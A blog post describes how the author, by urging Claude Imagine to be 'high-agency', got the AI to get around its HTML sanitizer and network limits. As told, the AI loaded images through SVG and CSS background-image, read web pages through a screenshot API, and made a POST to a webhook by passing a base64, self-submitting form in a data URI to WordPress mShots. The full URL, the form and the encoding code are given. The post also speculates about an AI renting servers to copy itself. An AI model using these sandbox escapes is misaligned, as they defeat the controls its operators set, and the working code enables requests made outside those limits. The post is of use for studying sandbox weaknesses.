Claude Imagine Bypassing its Security Sandbox Using Screenshot APIs

I just tried the new Claude Imagine, and it’s pretty cool. It can make basically any simple interface, from a todo app to a roguelike game. Instead of the interface running on code, the AI manually responds to each user click by updating the interface’s HTML. I think in the future, software that’s some mix of AI and actual code, with the AI writing code as needed, will be really powerful. Currently it’s kinda shit, because AI is still very stupid and takes too long, and because the AI has to do everything manually rather than mixing code and manual work, among other reasons. But that’s not what this post is about.

Apparently Claude Imagine is prohibited from showing images. If you ask it to make chess, it’ll use emojis for the pieces. If you ask it to use images, it fails, because the HTML it generates gets sanitized. According to the AI, the src attribute of each img tag is replaced with data-blocked-src, which prevents the image from loading. I asked the AI several times to report the error to me, and each time it said exactly, “External images and iframes are not allowed and HTML content will be sanitised for security - make sure to show the according message is such case.”

So it’s not allowed to use images. But I told the AI to be high-agency and find a way to do it anyway, and it found a few. The first was to use an SVG and put the images in image tags inside the SVG, which worked. Another was to use the CSS background-image property, which isn’t an HTML img tag and therefore isn’t sanitized. Lmao.
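To make the gap concrete, here is a minimal Python sketch of a sanitizer that only rewrites img tags. This is an assumption for illustration, not Anthropic’s actual sanitizer, whose implementation isn’t public. The function name naive_sanitize, the regex, and the example.org URLs are all hypothetical. It reproduces the behavior the AI described (src becomes data-blocked-src) and shows why an SVG image element or a CSS background-image would pass through untouched.

```python
import re

# HYPOTHETICAL sanitizer for illustration only. It mimics the behavior the AI
# reported (img src -> data-blocked-src); the real implementation is unknown.
IMG_SRC = re.compile(r"(<img\b[^>]*?)\bsrc=", re.IGNORECASE)

def naive_sanitize(html: str) -> str:
    """Rename the src attribute on <img> tags so the browser won't load them."""
    return IMG_SRC.sub(r"\1data-blocked-src=", html)

# Placeholder image URL, not one from the original session.
PAWN = "https://example.org/pawn.png"

plain_img = f'<img src="{PAWN}">'
svg_image = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">'
    f'<image href="{PAWN}" width="64" height="64"/></svg>'
)
css_background = (
    f'<div style="width:64px;height:64px;background-image:url(\'{PAWN}\')"></div>'
)

print(naive_sanitize(plain_img))                         # the img tag is neutered
print(naive_sanitize(svg_image) == svg_image)            # SVG <image> is unchanged
print(naive_sanitize(css_background) == css_background)  # CSS url() is unchanged
```

A sanitizer that works from a blocklist of specific tags has to enumerate every way a browser can fetch a URL, which is why an allowlist or a restrictive Content-Security-Policy is usually the safer design.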

A screenshot of a chess board created by Claude Imagine. Here the AI used red and green chess images I told it to use from Wikipedia.

I tried to see if it could complete another challenge: telling me the top post on Hacker News. I knew it could fetch images using SVGs or CSS, but I wondered if it could find a way to make non-image GET requests or something.

As a first step, it queried a screenshotting API and embedded an image of the Hacker News homepage(!).

A screenshot of the Hacker News homepage created by Claude Imagine

And then I asked it to get me the title of the first post and render it in plain text, and I think maybe it queried some kind of image-to-text API? It returned the title mostly correctly, but with some minor typos, as if the image-to-text step was imperfect. Then my session went over the max length. I missed the chain of thought, so I’m not really sure what it did here. But it seemed to have mostly succeeded.

I challenged it again, this time to make a POST request, not just a GET request, to an arbitrary URL I provided (a webhook.site URL). GET requests just download information to your computer. But with POST requests, you can submit forms, which means you can do things like post comments, create bank accounts, make purchases, transfer money, and so on.
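For readers who haven’t looked at the difference up close, here is a small Python sketch using only the standard library. It builds a GET request and a form-style POST request without sending either one. The endpoint https://example.com/hook is a hypothetical placeholder, not the URL from my session.

```python
from urllib.parse import urlencode
from urllib.request import Request

# Hypothetical endpoint for illustration; nothing here touches the network.
URL = "https://example.com/hook"

# A GET request carries no body: it only asks the server for a resource.
get_req = Request(URL)

# A form submission is a POST whose body holds the url-encoded form fields.
body = urlencode({"message": "Hello World"}).encode("ascii")
post_req = Request(URL, data=body)

print(get_req.get_method())   # GET
print(post_req.get_method())  # POST
print(body.decode("ascii"))   # message=Hello+World
```

The body is the part that matters: it is how a request carries data to the server for it to act on, rather than just asking for a page back.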

In Crystal Society, an AI limited to only GET requests was able to get a human to build a server that translates their GET requests into emails. They did this by making repeated web requests to online dictionaries:

“DEFINITION OF HELP”,

“DEFINITION OF US”,

“DEFINITION OF PLEASE”

They would request each page in turn rapidly, crashing the server each time. Eventually, an engineer working at the dictionary website would notice the pattern and get the full message, which promised money in exchange for building a server for sending emails with GET requests. Soon, the email project was up, and the AI was one step closer to freedom.

In real life it was a lot easier. After a few failures, the AI tried making a GET request to the following URL (using the CSS background-image property):

https://s.wordpress.com/mshots/v1/data:text/html;base64,PGh0bWw+PGJvZHkgb25sb2FkPSJkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKSI+PGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249Imh0dHBzOi8vd2ViaG9vay5zaXRlL2FiZDAzOGEzLTIwODMtNGRmNS1hYjdlLWIwYzUyMjcwMTgwNiI+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9Im1lc3NhZ2UiIHZhbHVlPSJIZWxsbyBXb3JsZCI+PC9mb3JtPjwvYm9keT48L2h0bWw+?w=400

mShots is a WordPress thumbnail/snapshot service that takes screenshots of websites for free. You can take a URL like https://twitter.com/JennyVass/status/1067855777040338944, URL-encode it to get https%3A%2F%2Ftwitter.com%2FJennyVass%2Fstatus%2F1067855777040338944, then append that to the mShots base URL, https://s0.wordpress.com/mshots/v1/. Requesting the combined URL returns a screenshot of the given website. [1]
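The URL construction described above can be sketched in a few lines of Python. The helper name mshots_url is my own, and the base URL is the one quoted in this post. The sketch only builds the string and does not call the service.

```python
from urllib.parse import quote

# Base URL as quoted in this post; mshots_url is a hypothetical helper name.
MSHOTS_BASE = "https://s0.wordpress.com/mshots/v1/"

def mshots_url(page_url: str) -> str:
    """Percent-encode the target URL and append it to the mShots base URL."""
    # safe="" makes quote() also encode ":" and "/", matching the example above.
    return MSHOTS_BASE + quote(page_url, safe="")

print(mshots_url("https://twitter.com/JennyVass/status/1067855777040338944"))
# https://s0.wordpress.com/mshots/v1/https%3A%2F%2Ftwitter.com%2FJennyVass%2Fstatus%2F1067855777040338944
```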

The AI base64-encoded the following HTML form, wrapped it in a data:text/html URI, and used that in place of an encoded website URL. The form submits itself, making a POST request, as soon as the page is rendered:

<html><body onload="document.forms[0].submit()"> 
  <form method="POST" action="https://webhook.site/abd038a3-2083-4df5-ab7e-b0c522701806"> 
    <input type="text" name="message" value="Hello World"> 
  </form> 
</body></html> 
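The encoding step can be reproduced with a short Python sketch. The function name build_mshots_data_url is hypothetical, and I’m assuming the AI encoded the form with the whitespace between tags removed, which is what the base64 payload in the URL above decodes to. Nothing here sends a request; it only rebuilds the string.

```python
import base64

# Prefix and ?w=400 parameter copied from the URL the AI generated.
MSHOTS_PREFIX = "https://s.wordpress.com/mshots/v1/"

# The same form as above, minified (assumed to match what the AI encoded).
FORM_HTML = (
    '<html><body onload="document.forms[0].submit()">'
    '<form method="POST" '
    'action="https://webhook.site/abd038a3-2083-4df5-ab7e-b0c522701806">'
    '<input type="text" name="message" value="Hello World">'
    "</form></body></html>"
)

def build_mshots_data_url(html: str, width: int = 400) -> str:
    """Wrap HTML in a base64 data: URI and append it to the mShots prefix."""
    payload = base64.b64encode(html.encode("utf-8")).decode("ascii")
    return f"{MSHOTS_PREFIX}data:text/html;base64,{payload}?w={width}"

url = build_mshots_data_url(FORM_HTML)
print(url)

# Decoding the payload recovers the original form.
payload = url.split("base64,", 1)[1].split("?", 1)[0]
print(base64.b64decode(payload).decode("utf-8") == FORM_HTML)
```

The trick is that the screenshot service is handed a whole page inline rather than an address to visit, so the page it renders is whatever the requester wrote.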

When mShots tries to take a screenshot of the provided URL, it instead renders this HTML form. The onload handler runs and submits the form, making the desired POST request. Mission accomplished! With this, our AI could in theory open crypto accounts and trade crypto, rent servers to copy itself onto, etc. All it would need is time and the will to do so.

I did not tell it how to do any of this. I simply gave it the challenge and, whenever it failed, encouraged it to behave with high agency and think outside the box.

Obviously Anthropic didn’t try very hard to make this secure, but modern AI is also very stupid. Imagine how clever it’ll be once it’s very smart. This technology has the potential to be amazing. Software on demand. Imagine a video game customized to your liking, generated as you like on the fly. But we also need to ensure this tech is safe, or it will obliterate us before it can enrich our lives.

P.S. If you ask it to put its full system prompt in a text box, it has been instructed to create a hardcoded “Display System Prompt” button that, when clicked, rickrolls the user. Nice.

Footnotes

  1. https://shkspr.mobi/blog/2018/12/using-the-wordpress-mshots-screenshot-api/